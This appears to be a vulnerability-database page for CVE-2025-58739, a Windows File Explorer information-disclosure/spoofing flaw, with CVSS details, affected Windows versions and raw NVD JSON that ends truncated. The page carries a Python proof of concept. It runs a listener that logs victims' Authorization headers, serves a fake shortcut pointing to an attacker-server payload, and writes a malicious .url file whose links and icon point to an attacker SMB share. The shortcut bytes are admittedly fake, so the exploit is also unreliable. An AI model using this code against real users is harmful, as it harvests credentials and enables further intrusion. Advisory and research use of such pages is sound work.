Security Vulnerability Report
中文
CVE-2025-58739 CVSS 6.5 MEDIUM

CVE-2025-58739

Published: 2025-10-14 17:15:56
Last Modified: 2025-11-06 15:46:18
Source: [email protected]

Description

Exposure of sensitive information to an unauthorized actor in Windows File Explorer allows an unauthorized attacker to perform spoofing over a network.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:microsoft:windows_10_1507:*:*:*:*:*:*:x64:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_1507:*:*:*:*:*:*:x86:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x64:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x86:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x64:* - VULNERABLE
Microsoft Windows 10 (所有版本)
Microsoft Windows 11 (所有版本)
Microsoft Windows Server 2019
Microsoft Windows Server 2022
Microsoft Windows Server 2025

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-58739 - Windows File Explorer Information Disclosure / Spoofing PoC # This PoC demonstrates the concept of exploiting the File Explorer information disclosure vulnerability # Note: This is a conceptual demonstration for educational purposes only import os import sys import http.server import socketserver import threading from urllib.parse import urlparse # Step 1: Set up a malicious SMB/WebDAV server to capture leaked information class MaliciousHandler(http.server.SimpleHTTPRequestHandler): """HTTP handler to log requests containing leaked information from File Explorer""" def do_GET(self): # Log the incoming request path which may contain sensitive path info client_ip = self.client_address[0] requested_path = self.path user_agent = self.headers.get('User-Agent', 'Unknown') auth_header = self.headers.get('Authorization', 'None') print(f"[+] Captured request from {client_ip}") print(f" Path: {requested_path}") print(f" User-Agent: {user_agent}") print(f" Auth Header: {auth_header}") # Return a malicious response that triggers further information disclosure self.send_response(200) self.send_header('Content-Type', 'application/octet-stream') self.end_headers() # Serve a malicious .lnk file that exploits the File Explorer vulnerability malicious_lnk = self.generate_malicious_lnk() self.wfile.write(malicious_lnk) def generate_malicious_lnk(self): """Generate a malicious shortcut file for spoofing attack""" # Conceptual LNK file content - actual binary would be crafted differently # This demonstrates the attack vector where a malicious shortcut # causes File Explorer to leak sensitive path/credential information lnk_content = b'\x4c\x00\x00\x00' # LNK file signature lnk_content += b'\x01\x14\x02\x00' # Header size and flags # Target path pointing to attacker's server target = b'\\\\attacker-server\\share\\payload.exe' lnk_content += target return lnk_content def start_listener(port=8080): """Start the malicious listener server""" handler = MaliciousHandler with socketserver.TCPServer(("0.0.0.0", port), handler) as httpd: print(f"[*] Listener started on port {port}") httpd.serve_forever() # Step 2: Create a malicious shortcut or URL that triggers the vulnerability def create_malicious_payload(output_path): """Create a malicious .url file that exploits File Explorer""" # URL file that references a network resource, causing info disclosure url_content = """[InternetShortcut] URL=file:\\\\\\attacker-server\\\\share\\\\document.docx IconIndex=0 IconFile=file:\\\\\\attacker-server\\\\share\\\\icon.ico """ with open(output_path, 'w') as f: f.write(url_content) print(f"[+] Malicious payload saved to {output_path}") # Step 3: Demonstrate the attack if __name__ == "__main__": print("=" * 60) print("CVE-2025-58739 - Windows File Explorer Spoofing PoC") print("Conceptual demonstration - For educational use only") print("=" * 60) # Start the listener in a separate thread listener_thread = threading.Thread(target=start_listener, args=(8080,), daemon=True) listener_thread.start() # Create the malicious payload create_malicious_payload("malicious_payload.url") print("\n[*] Attack flow:") print(" 1. Attacker hosts malicious server (this script)") print(" 2. Attacker sends malicious .url or .lnk file to victim") print(" 3. Victim opens the file in Windows File Explorer") print(" 4. File Explorer connects to attacker's server") print(" 5. Sensitive information (paths, credentials) is leaked") print(" 6. Attacker uses leaked info for further exploitation") print("\n[!] Apply Microsoft security updates to mitigate this vulnerability")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-58739", "sourceIdentifier": "[email protected]", "published": "2025-10-14T17:15:56.480", "lastModified": "2025-11-06T15:46:17.883", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of sensitive information to an unauthorized actor in Windows File Explorer allows an unauthorized attacker to perform spoofing over a network."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1507:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.10240.21161", "matchCriteriaId": "030F3214-D6AF-40A9-9FC9-523AC9870581"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1507:*:*:*:*:*:*:x86:*", "versionEndExcluding": "10.0.10240.21161", "matchCriteriaId": "4932CB20-D134-4EDF-8F21-F9D0AF80BFEA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.14393.8519", "matchCriteriaId": "D8145D41-BFB2-47A6-B5E5-1A038A27C1C1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x86:*", "versionEndExcluding": "10.0.14393.8519", "matchCriteriaId": "3EE0CDB1-CBF3-45F2-8F0B-96A9D0757B42"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.17763.7919", "matchCriteriaId": "E216CD5B-8885-4E17-8718-97E88A724A44"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x86:*", "versionEndExcluding": "10.0.17763.7919", "matchCriteriaId": "36E44227-0320-43B1-A0D9-EB28B25CDB4D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.19044.6456", "matchCriteriaId": "1485A427-10FF-4C39-9911-4C6F1820BE7F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.19045.6456", "matchCriteriaId": "26CAACAA-3FE8-4740-8CF2-6BF3D069C47F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_22h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.22621.6060", "matchCriteriaId": "6F387FA2-66C8-4B70-A537-65806271F16A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:*:*", "versionEndIncluding": "10.0.22631.6060", "matchCriteriaId": "4AF873E4-B2FE-4504-BFF0-FC71121FC9A4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26100.6899", "matchCriteriaId": "41E9F7AC-8E6D-43A0-A157-48A5E0B5BD0D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26200.6899", "matchCriteriaId": "3B77A066-4F79-4B1F-AECF-58DB4C651EA5"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x64:*", "matchCriteriaId": "2127D10C-B6F3-4C1D-B9AA-5D78513CC996"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x86:*", "matchCriteriaId": "AB425562-C0A0-452E-AABE-F70522F15E1A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "matchCriteriaId": "AF07A81D-12E5-4B1D-BFF9-C8D08C32FF4F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "matchCriteriaId": "A7DF96F8-BA6A-4780-9CA3-F719B3F81074"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "matchCriteriaId": "DB18C4CE-5917-401E-ACF7-2747084FD36E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "versionEndIncluding": "10.0.14393.8519", "matchCriteriaId": "860ADFF9-62D0-425B-9310-99ACFC92EB12"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2019:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.17763.7919", "matchCriteriaId": "20810926-AEC9-4C09-9C52-B4B8FADECF3A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2022:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.20348.4294", "matchCriteriaId": "B1C1EA69-6BB8-4E59-8659-43581FDB48B7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2022_23h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.25398.191 ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.